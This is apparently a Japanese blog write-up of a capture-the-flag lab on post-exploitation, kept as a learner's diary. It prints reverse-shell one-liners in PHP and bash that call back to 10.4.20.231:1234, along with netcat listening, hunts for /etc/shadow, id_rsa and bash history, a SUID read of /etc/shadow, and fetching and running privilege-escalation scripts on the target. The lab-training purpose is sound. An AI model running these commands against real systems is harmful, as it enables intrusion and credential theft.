シェル獲得後どうしたらいいかわからない人(私です)のためのRoom
- URL=
Task 1 Introduction
No answer needed
タスクとしてはノーアンサーだけどまずシェルを取らないと続きができなくなってるのでシェルをとるのをやろうってことらしい。
Method 1:Browse to cmd.php and add the following php payload to the input field.
まずマシンをデプロイして、指示通り http://<ip>:3000
につなぐ
data:image/s3,"s3://crabby-images/ddc85/ddc855820c9a0451b4d12208c7c86c2878d49ef9" alt=""
やりかたが書いてあって親切。
cmd.phpファイルを作る(IPアドレスとポート番号を適宜変更する)
php -r '$sock=fsockopen("10.4.20.231",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
data:image/s3,"s3://crabby-images/00346/00346961104ba0a5599fa9c7456e92baefcd05ec" alt=""
Method 2:Upload a reverse shell file below and execute it using the cmd.php
アップロードして http://<IP>:3000/cmd.php
にアクセスする。
data:image/s3,"s3://crabby-images/f6748/f67484d5ef490056b55347898463fc3ea6846320" alt=""
自端末のほうでncコマンドで待ち受ける
nc -lvnp 1234
data:image/s3,"s3://crabby-images/d13b5/d13b593ddd9f1940e4ea6bf22b5cb2d5b18ee1a4" alt=""
フォームっぽいところにリバースシェルを入れてEnter
data:image/s3,"s3://crabby-images/e92f5/e92f5a05db314ce2b6ec3e979939d6c49ca463aa" alt=""
bash -c 'bash -i >& /dev/tcp/10.4.20.231/1234 0>&1'
シェルのコマンドがよくわからなかったのでこちらで調べた
待受画面に応答がある。
data:image/s3,"s3://crabby-images/0ef2e/0ef2e08381b58641caa189d1948ccbbca4576087" alt=""
Task 2 Unit 1 – tty
- netcatのリバースシェルはすぐ壊れるから安定化させようって話
- 普通のシェルのことをttyと呼ぶ
- ttyを取得する一つの方法は/bin/bashをなんとかして実行すること
なるほどー。侵入したらすぐ昇格を試すんじゃないんだなあ。
How would you execute /bin/bash with perl?
ぜんぜん知らんので調べる、普通に載ってた。
- URL=
Task 3 Unit 1 – ssh
sshでいつでも繋げるようにしておくと便利だよ、って話。(便利とは)
Where can you usually find the id_rsa file? (User = user)
公開鍵のデフォルトの場所
/home/user/.ssh/id_rsa
Is there an id_rsa file on the box? (yay/nay)
見たけどなかったのでナーイ(…)
実際の環境でやってみよう!ってことを暗に言ってるのかと思ってたけどこのタスクは違うんだな??まぎらわしいな?英語難しい。
Task 4 Unit 2 – Basic enumeration
このタスクから本格的に昇格するための手順。
まずは情報収集しましょうってことらしい。
How would you print machine hardware name only?
uname -m
Where can you find bash history?
~/.bash_history
What’s the flag?
.bash_historyの中見たらフラグが(えー)
data:image/s3,"s3://crabby-images/9aa5b/9aa5b22d477c8b1d1b321c6d3db420662769ffc9" alt=""
Task 5 Unit 3 – /etc
/etc/passwdとか/etc/shadowが見れたらワンチャンあるよって話
Can you read /etc/passwd on the box? (yay/nay)
みれた
Task 6 Unit 4 – Find command and interesting files
役立ちそうなファイル探索のコマンド。findコマンド練習専用のroomあるんだ。
- URL=
.log
.conf
.bak
あたりを探すのがコツですってよ。
What’s the password you found?
find -type f -name "*.bak" 2>/dev/null
あった
data:image/s3,"s3://crabby-images/5f9d4/5f9d4707464558697cec947f83ca4a9fb946dba8" alt=""
Did you find a flag?
find -type f -name "*.conf" 2>/dev/null | grep flag
data:image/s3,"s3://crabby-images/6f76e/6f76e7fb18e66a1362d77e35e718b9841b7fe273" alt=""
Task 7 Unit 4 – SUID
Which SUID binary has a way to escalate your privileges on the box?
SUIDのついてるバイナリを探す
find / -perm -u=s -type f 2>/dev/null
data:image/s3,"s3://crabby-images/5a1a0/5a1a09cf11d464d3ac27d462b83ab1aef4af908b" alt=""
What’s the payload you can use to read /etc/shadow with this SUID?
ヒントどおり↓見た
- URL=
こんな単純に?と思いながら実行したら読めた…こういうのほんと魔法みたいだなって思う
grep ” /etc/shadow
data:image/s3,"s3://crabby-images/2f2e6/2f2e6b0c22c50a6e1b5875fc273cae08a93b7323" alt=""
Task 8 [Bonus] – Port Forwarding
Try using those commands on your system!
No answer needed
トライしたけど Command 'netstat' not found
って言われるんだが??
まあノーアンサーだからいいか…開いてるポート確認するのも大事だよって話かな。何がボーナスなのだろう。
Task 9 Unit 5 – Automating scripts
No answer needed
みんな大好きlinPEASとLinEnumの話。と思ったらRoom作者の方は嫌いらしいw
- URL=
- URL=
どっちかやればいいのかと思ってたけどできるなら両方実行したほうがいいらしい。そうなんだー。
スクリプトの設置
ツールが置いてある的なことが書いてあるけどどこにあるかわからん…。
仕方ないのでスクリプトをそれぞれダウンロード自分のPCにダウンロードする
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
data:image/s3,"s3://crabby-images/db0ad/db0adf507e17b3b642591a91b66bfc0a6de9f49e" alt=""
ダウンロードしてきたファイルのある場所でhttpサーバ立ち上げる
python3 -m http.server
data:image/s3,"s3://crabby-images/d203f/d203f82e8347b19057631416740c8a8116b618fd" alt=""
Roomのターゲットマシンのほうからwget(curlコマンドが使えなかった…)で取りに行く
wget $LOCALIP:8000/linpeas.sh
wget $LOCALIP:8000/LinEnum.sh
data:image/s3,"s3://crabby-images/a01a8/a01a81950621355ef8fcf56fbeebe6fbe030041a" alt=""
スクリプト実行
ターゲットマシン内でスクリプトを実行する
実行権限なかったのでつける
chmod +x linpeas.sh
chmod +x LinEnum.sh
data:image/s3,"s3://crabby-images/23add/23add3716d579966d221f96d9024ae61fb1a4b93" alt=""
実行する
./linpeas.sh
この枝豆3兄弟的なやつかわいいよね
data:image/s3,"s3://crabby-images/1bc71/1bc71f4f10876b704351c80c8fb55b67a73d1f9b" alt=""
./LinEnum.sh
data:image/s3,"s3://crabby-images/829dd/829dd43802d399a112b0186d7260066179bbb4a1" alt=""
列挙はできたものの…読み取り方がよくわからない…(よくある)
Task 10 Resources and what’s next?
No answer needed
続きの学習におすすめのRoomの紹介。
結局場数を踏まないとわかってこないのかもしれないなーと思った。もう少し経験を積んでから振り返ってみたい。